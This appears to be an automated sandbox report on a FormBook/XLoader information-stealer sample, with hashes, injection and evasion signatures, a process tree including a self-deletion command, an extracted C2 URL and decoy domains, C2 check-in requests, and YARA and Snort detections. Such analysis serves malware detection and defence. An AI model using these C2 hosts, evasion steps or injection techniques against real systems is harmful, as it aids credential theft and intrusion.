Windows Analysis Report cK1g5gckZR9VHjj.exe

Overview

General Information

Sample Name: cK1g5gckZR9VHjj.exe
Analysis ID: 528618
MD5: 5f19b9a3e41ef2e6ec3200bf4a246cec
SHA1: 25638b49edf7444005e1e02fb5d972da5920e1d8
SHA256: afac806262706aea36f8c34cb56ffa94f49da9b39b752cfd077f9b921e972c1d
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Uses netsh to modify the Windows network and firewall settings
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • cK1g5gckZR9VHjj.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
    • cK1g5gckZR9VHjj.exe (PID: 1312 cmdline: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
    • cK1g5gckZR9VHjj.exe (PID: 6104 cmdline: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe MD5: 5F19B9A3E41EF2E6EC3200BF4A246CEC)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • netsh.exe (PID: 6904 cmdline: C:\Windows\SysWOW64\netsh.exe MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
          • cmd.exe (PID: 6900 cmdline: /c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.spoiledzone.com/udeh/"], "decoy": ["pimpyoursmile.com", "mibikeshops.com", "blueprintroslyn.com", "onlinedatingthaiweb.com", "filmweltruhr.com", "apprigutimaunrpgroup.com", "prolineautoservices.com", "thejohnmatt.com", "predialisbolivia.com", "pittsburghdata.center", "janeflwr.com", "usxigroup.com", "canurfaliogli.net", "securebankofamericalog.site", "concernedclimatecitizen.com", "756256.xyz", "blaclyteproductions.com", "chaturey.com", "mesoftbilisim.com", "crochetastitch.com", "biggirlrantz.com", "trenddoffical.com", "eureka.quest", "syuanbao.com", "auspicious.tech", "mypc.host", "hemeishun.com", "3973rollingvalleydrive.com", "lovebydarius.store", "z1liner.com", "pspoint.com", "skincell-advanced.website", "937281.com", "mygranitepro.com", "masterlotz.com", "electricidadygasmx.com", "mmcyxx.com", "fixmetech.com", "teesworkshop.com", "topshelfbudshop.com", "ccnet.club", "myfranciscanshoe.com", "kyrstensinema2024.com", "selectioncoeur.com", "nrgd1.club", "qzttb.net", "ouidles.com", "royaldears.com", "downingmunroe.online", "seawooenc.com", "flagfootballcoaches.com", "tremblock.com", "finsits.com", "rcepjobs.com", "web-control.biz", "notvaccinatedjobs.com", "glueandstack.com", "modularbuildingsolutions.net", "sosibibyslot.website", "dragonmodz.net", "turkishdelightday.xyz", "dentalhealth24.com", "celtabet153.xyz", "pigsandbees.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com | strings:
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group | strings:
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

Unpacked PEs

Source | Rule | Description | Author | Strings
2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |
2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group |
2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security |
2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook (same configuration as listed under Malware Configuration above)
Yara detected FormBook
Source: Yara match | File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORY
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: cK1g5gckZR9VHjj.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: cK1g5gckZR9VHjj.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: netsh.pdb source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
Source: Binary string: netsh.pdbGCTL source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434873438.0000000002FB0000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: cK1g5gckZR9VHjj.exe, cK1g5gckZR9VHjj.exe, 00000002.00000002.434367747.00000000010DF000.00000040.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000002.00000002.434242633.0000000000FC0000.00000040.00000001.sdmp, netsh.exe, netsh.exe, 0000000C.00000002.612442715.00000000037A0000.00000040.00000001.sdmp, netsh.exe, 0000000C.00000002.612896446.00000000038BF000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 4x nop then pop edi | 2_2_00415660
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 4x nop then pop esi | 2_2_004157D8
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe | Code function: 4x nop then pop esi | 2_2_004157AA
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop edi | 12_2_02DD5660
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop esi | 12_2_02DD57D8
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 4x nop then pop esi | 12_2_02DD57AA

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49801 -> 3.64.163.50:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 142.252.22.166 80
Source: C:\Windows\explorer.exe | Network Connect: 154.94.210.101 80
Source: C:\Windows\explorer.exe | Domain query: www.dragonmodz.net
Source: C:\Windows\explorer.exe | Network Connect: 3.64.163.50 80
Source: C:\Windows\explorer.exe | Domain query: www.blueprintroslyn.com
Source: C:\Windows\explorer.exe | Domain query: www.qzttb.net
Source: C:\Windows\explorer.exe | Domain query: www.royaldears.com
Source: C:\Windows\explorer.exe | Domain query: www.pittsburghdata.center
Source: C:\Windows\explorer.exe | Network Connect: 209.17.116.163 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.spoiledzone.com/udeh/
Source: Joe Sandbox View | ASN Name: EGIHOSTINGUS EGIHOSTINGUS
Source: Joe Sandbox View | ASN Name: ROOTNETWORKSUS ROOTNETWORKSUS
Source: global traffic | HTTP traffic detected: GET /udeh/?Ipp=0GJ3uF0xqxUvxNgo0ZAG0/AKZrovZvEja3W0Pwl2ZRVpe8mYbBKREVo+7yTMDi1lrzUfYpfKkw==&w8e=oTrd HTTP/1.1 | Host: www.qzttb.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /udeh/?Ipp=v0MSI9GJGiZ1sOz/LzfG2QhElsQnBWapnw3k3ldXy2xTual36y4oBDIxb66ss1xce1kRKjOJbQ==&w8e=oTrd HTTP/1.1 | Host: www.royaldears.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1 | Host: www.dragonmodz.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 3.64.163.50 3.64.163.50
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=utf-8 | Server: Microsoft-IIS/10.0 | X-Powered-By: PHP/7.0.33 | X-Powered-By: ASP.NET | Date: Thu, 25 Nov 2021 14:11:35 GMT | Connection: close | Content-Length: 7447
Source: cK1g5gckZR9VHjj.exe, 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, cK1g5gckZR9VHjj.exe, 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000005.00000000.381972183.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.396876565.000000000095C000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.358537483.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: unknown | DNS traffic detected: queries for: www.qzttb.net

E-Banking Fraud:

Yara detected FormBook

System Summary:

Malicious sample detected (through community Yara rule)
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: cK1g5gckZR9VHjj.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cK1g5gckZR9VHjj.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.cK1g5gckZR9VHjj.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
